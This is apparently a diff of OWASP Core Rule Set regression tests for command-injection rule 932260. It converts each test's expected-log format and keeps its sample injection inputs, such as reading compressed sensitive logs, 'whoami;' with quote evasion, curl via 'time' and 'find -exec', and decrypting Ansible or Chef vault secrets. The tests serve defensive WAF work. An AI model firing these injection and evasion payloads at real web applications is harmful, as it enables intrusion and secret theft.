dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=gunzip -c /var/log/sensitive_log_file.gz' + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [932260] + - test_id: 10 desc: "Positive test: Data exfiltration with zstdcat" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'cmd=zstdcat /var/log/sensitive_log_file.zst' - uri: "/post" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-11 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'cmd=zstdcat /var/log/sensitive_log_file.zst' + uri: "/post" + version: "HTTP/1.1" + output: + log: + expect_ids: [932260] + - test_id: 11 desc: "Positive test: Unix Command Injection - busybox test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - # code=busybox -c "echo hi" - uri: "/get?code=busybox%20-c%20%22echo%20hi%22" - version: "HTTP/1.1" - output: - log_contains: id "932260" - - test_title: 932260-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + # code=busybox -c "echo hi" + uri: "/get?code=busybox%20-c%20%22echo%20hi%22" + version: "HTTP/1.1" + output: + log: + expect_ids: [932260] + - test_id: 12 desc: Remote Command Execution bypass with time stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+bsdtar+" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 
932260-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+bsdtar+" + version: HTTP/1.1 + output: + log: + expect_ids: [932260] + - test_id: 13 desc: Remote Command Execution bypass with time negative test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+warner+" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+warner+" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932260] + - test_id: 14 desc: Remote Command Injection test for BB finding 935E1D91 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=time+curl+coreruleset.org" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=time+curl+coreruleset.org" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932260] + - test_id: 15 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo=ti''me+curl+coreruleset.org" - version: HTTP/1.1 - output: - no_log_contains: id "932260" - - test_title: 932260-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo=ti''me+curl+coreruleset.org" + version: HTTP/1.1 + output: + log: + no_expect_ids: [932260] + - test_id: 16 desc: System Command Injection test for BB finding AV6ZO3ZS - mixed case stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: en-us,en;q=0.5 - method: GET - port: 80 - uri: "/get?foo='ZsTdcaT+/var/log/sensitive_log_file.zst" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate, br + Accept-Language: en-us,en;q=0.5 + method: GET + port: 80 + uri: "/get?foo='ZsTdcaT+/var/log/sensitive_log_file.zst" + version: HTTP/1.1 + output: + log: + expect_ids: [932260] + - test_id: 17 desc: "'find' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=find%20.%201%20-exec%20curl%20google.com%20\\;" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-18 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=find%20.%201%20-exec%20curl%20google.com%20\\;" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 18 desc: "'find' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=find%20x%20for%20y" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-19 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=find%20x%20for%20y" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 19 desc: "'ping' direct command injection 
FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ping%20127.0.0.1" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-20 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ping%20127.0.0.1" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 20 desc: "FP for 'head of'" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "job_title=head%20of" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-21 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "job_title=head%20of" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 21 desc: "False positive test: 'evaluation' (FP while rule looks for 'eval')" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?word=evaluation" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-22 + - input: + 
dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?word=evaluation" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 22 desc: "False positive test: 'schedule' (FP while rule looks for 'sched')" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?word=schedule" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-23 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?word=schedule" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 23 desc: "FP with word comment Github Issue #3387" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-24 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932260] + - test_id: 24 desc: "FP against name 'Perlak' (matches 'perl')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?last_name=Perlak" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-25 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?last_name=Perlak" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932260] + - test_id: 25 desc: "FP against word 'Axel'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?first_name=Axel" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-26 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?first_name=Axel" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932260] + - test_id: 26 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=performance" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-27 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=performance" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932260] + - test_id: 27 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=perf --version" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-28 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=perf --version" + version: HTTP/1.1 + output: + log: + expect_ids: [932260] + - test_id: 28 desc: | Match despite quote evasion attempt. 932260 accidentally contained a chain rule for some time that enabled trivial bypasses, by excluding matches against number separators (see 932240). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?a=whoami;0'0'\"" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-29 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?a=whoami;0'0'\"" + version: HTTP/1.1 + output: + log: + expect_ids: [932260] + - test_id: 29 desc: "FP against word 'Cronk'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?last_name=Cronk" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-30 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?last_name=Cronk" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932260] + - test_id: 30 desc: "Block ad-hoc ansible commands" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible all -m ping - output: - log_contains: id "932260" - - test_title: 932260-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible all -m ping + output: + log: + expect_ids: [932260] + - test_id: 31 desc: "Block ansible config dump command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-config dump - output: - log_contains: id "932260" - - test_title: 932260-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-config dump + output: + log: + expect_ids: [932260] + - test_id: 32 desc: "Block installing collections from ansible galaxy" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-galaxy collection install community.general - output: - log_contains: id "932260" - - test_title: 932260-33 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-galaxy collection install community.general + output: + log: + expect_ids: [932260] + - test_id: 33 desc: 
"Block ad-hoc ansible commands using ansible-console" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-console - output: - log_contains: id "932260" - - test_title: 932260-34 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-console + output: + log: + expect_ids: [932260] + - test_id: 34 desc: "Block ansible-doc command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-doc plugin ping - output: - log_contains: id "932260" - - test_title: 932260-35 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-doc plugin ping + output: + log: + expect_ids: [932260] + - test_id: 35 desc: "Block dumping ansible inventory file and variables" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-inventory --list - 
output: - log_contains: id "932260" - - test_title: 932260-36 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-inventory --list + output: + log: + expect_ids: [932260] + - test_id: 36 desc: "Block ansible pull from remote repository" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-pull --url example.com - output: - log_contains: id "932260" - - test_title: 932260-37 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-pull --url example.com + output: + log: + expect_ids: [932260] + - test_id: 37 desc: "Block decrypting ansible secrets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-vault decrypt secret - output: - log_contains: id "932260" - - test_title: 932260-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + 
code=ansible-vault decrypt secret + output: + log: + expect_ids: [932260] + - test_id: 38 desc: "Block execution of ansible playbooks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-playbook site.yml - output: - log_contains: id "932260" - - test_title: 932260-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-playbook site.yml + output: + log: + expect_ids: [932260] + - test_id: 39 desc: "Block decryption of secrets with chef-vault" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-vault -i secret - output: - log_contains: id "932260" - - test_title: 932260-40 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-vault -i secret + output: + log: + expect_ids: [932260] + - test_id: 40 desc: "Block execution of chef-shell command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: 
POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-shell - output: - log_contains: id "932260" - - test_title: 932260-41 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-shell + output: + log: + expect_ids: [932260] + - test_id: 41 desc: "Block execution chef recipie book" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-run all recipie.rb - output: - log_contains: id "932260" - - test_title: 932260-42 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-run all recipie.rb + output: + log: + expect_ids: [932260] + - test_id: 42 desc: "Block execution chef recipie book against a specific node" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-client -t 1.1.1.1 - output: - log_contains: id "932260" - - test_title: 932260-43 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + 
port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-client -t 1.1.1.1 + output: + log: + expect_ids: [932260] + - test_id: 43 desc: "Block execution of visudo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=visudo - output: - log_contains: id "932260" - - test_title: 932260-44 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=visudo + output: + log: + expect_ids: [932260] + - test_id: 44 desc: "Block execution of CrowdSec cscli" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cscli alerts list - output: - log_contains: id "932260" - - test_title: 932260-45 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cscli alerts list + output: + log: + expect_ids: [932260] + - test_id: 45 desc: "Test for false positive with name Axel Smith" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - 
